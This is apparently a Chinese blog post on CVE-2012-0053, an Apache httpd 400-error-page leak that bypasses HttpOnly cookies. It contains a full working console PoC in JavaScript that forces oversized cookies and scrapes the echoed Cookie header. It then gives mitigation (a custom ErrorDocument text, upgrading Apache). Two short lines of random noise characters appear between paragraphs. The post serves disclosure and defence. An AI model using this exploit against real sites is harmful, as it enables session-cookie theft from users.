很多程序以及一些商业或成熟开源的 CMS 文章系统为了防止 XSS 盗取用户 cookie，一般都会给 cookie 加上 HttpOnly 属性，禁止直接用 JS 读取用户的 cookie，从而降低 XSS 的危害。而 Apache httpd 的这个问题（400 错误页面会原样回显导致错误的请求头，其中包含 Cookie 头）刚好可以用来绕过 HttpOnly：只要能在页面里执行 JS，就可以让浏览器发出一个带超长 Cookie 的请求，再从错误页面里把完整的 Cookie 读回来。
" j, _" R: s: s( I7 ^9 O! i+ I: C/ U; t0 e
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
3 X; M S$ O5 j7 U8 p- y; W
/ Y. i# ^2 Y* J! ]3 v* r/ x/ l
// Source: http://www.exploit-db.com/exploits/18442/ (Apache httpd HttpOnly cookie disclosure via the 400 error page)
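/**
 * Plants (or expires) a set of oversized "xssN" cookies on the current origin.
 *
 * The PoC relies on the browser attaching all of these cookies to the next
 * request so that the Cookie header grows past the server's request-field
 * limit and Apache answers 400. With the defaults that is 10 cookies of
 * ~825 bytes each; presumably chosen to exceed Apache's default
 * LimitRequestFieldSize of 8190 bytes — TODO confirm against the target,
 * and raise `size`/`count` if the server uses a larger limit.
 *
 * Kept in ES5 so it still runs when pasted into older browser consoles.
 *
 * @param {boolean} [good]  true: expire the previously planted cookies
 *                          (clean-up); falsy/omitted: plant them.
 * @param {number}  [count] number of cookies to plant/expire (default 10).
 * @param {number}  [size]  length of each cookie's value in characters
 *                          (default 819).
 * @returns {undefined}
 */
function setCookies(good, count, size) {
  var n = (count === undefined) ? 10 : count;
  var len = (size === undefined) ? 819 : size;
  // Array#join is the ES5 way to build a repeated string.
  var filler = new Array(len + 1).join('x');
  // A date one millisecond in the past makes the browser drop the cookie.
  var expired = new Date(+new Date() - 1).toUTCString();

  for (var i = 0; i < n; i++) {
    document.cookie = good
      ? 'xss' + i + '=;expires=' + expired + '; path=/;'
      : 'xss' + i + '=' + filler + ';path=/';
  }
}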
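/**
 * Issues a same-origin GET carrying the oversized "xssN" cookies planted by
 * setCookies() and, if the server rejects the request with 400, scrapes the
 * echoed Cookie header out of the error page and shows it via alert().
 *
 * Output is only produced when the 400 page echoes the offending request
 * header inside a <pre> element (the Apache behaviour this PoC targets);
 * any other reply just triggers the cookie clean-up.
 *
 * Fixes over the published snippet:
 *  - the per-cookie loop called split() on the array instead of its element;
 *  - match() returning null was dereferenced (TypeError on a non-echoing page);
 *  - the filler cookies were only expired on a 400 reply, leaving every later
 *    request from this origin failing if the server answered otherwise;
 *  - cookie names kept the leading space left by splitting on ';', and values
 *    containing '=' (e.g. base64 padding) were truncated by split('=', 2).
 *
 * @returns {undefined}  The result is delivered asynchronously via alert().
 */
function makeRequest() {
  // Plant the oversized cookies first so they ride along on this request.
  setCookies();

  var xhr = new XMLHttpRequest();

  /**
   * Parses the "Cookie: a=1; b=2" text echoed inside <pre> of the 400 page
   * into an object, dropping the xssN filler cookies.
   *
   * @param {string} html raw response body
   * @returns {Object<string,string>} cookie name -> value (empty if the
   *          page does not contain a <pre> block)
   */
  function parseCookies(html) {
    var dict = {};
    // The header is echoed on one line inside <pre>; collapse newlines first.
    var found = html.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
    if (!found) {
      return dict;
    }
    var header = found[1].replace('Cookie: ', '');
    var parts = header.replace(/xss\d+=x+;?/g, '').split(/;/g);
    for (var i = 0; i < parts.length; i++) {
      var part = parts[i];
      // Split on the first '=' only so values containing '=' survive.
      var eq = part.indexOf('=');
      var name = (eq < 0 ? part : part.slice(0, eq)).trim();
      if (name) {
        dict[name] = eq < 0 ? undefined : part.slice(eq + 1);
      }
    }
    return dict;
  }

  xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) {
      return;
    }
    // Always expire the filler cookies once the request has completed.
    setCookies(true);
    // Only a 400 reply carries the echoed header we are after.
    if (xhr.status === 400) {
      alert(JSON.stringify(parseCookies(xhr.responseText)));
    }
  };
  xhr.open('GET', '/', true);
  xhr.send(null);
}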
// Entry point: fire the PoC request as soon as the snippet is pasted into the console.
makeRequest();
你就能看见华丽丽的 400 错误页面里包含着完整的 Cookie 信息（含 HttpOnly 的 cookie）。

下载地址: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

修复方案:
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message（输出一个简单生硬的错误信息）
2. output a customized message（输出一段自定义信息）
3. redirect to a local URL-path to handle the problem/error（转向一个本地的自定义页面）
4. redirect to an external URL to handle the problem/error（转向一个外部 URL）
经测试，对于 400 错误只有方法 2（自定义文本信息）有效，返回包不会再包含 Cookie 内容。注意：上述文档同时指出，对于畸形请求 Apache 可能忽略 ErrorDocument 直接返回内部错误信息，所以配置后务必用上面的脚本复测；这只是缓解措施，根本修复仍然是升级 Apache。
Apache 配置（注意 `ErrorDocument` 与状态码之间有空格，引号表示这是一段文本信息而非 URL）:

ErrorDocument 400 "security test"
当然，升级 Apache 到修复版本（2.2.22 及以上，此问题编号为 CVE-2012-0053）也可以 :)。

参考: http://httpd.apache.org/security/vulnerabilities_22.html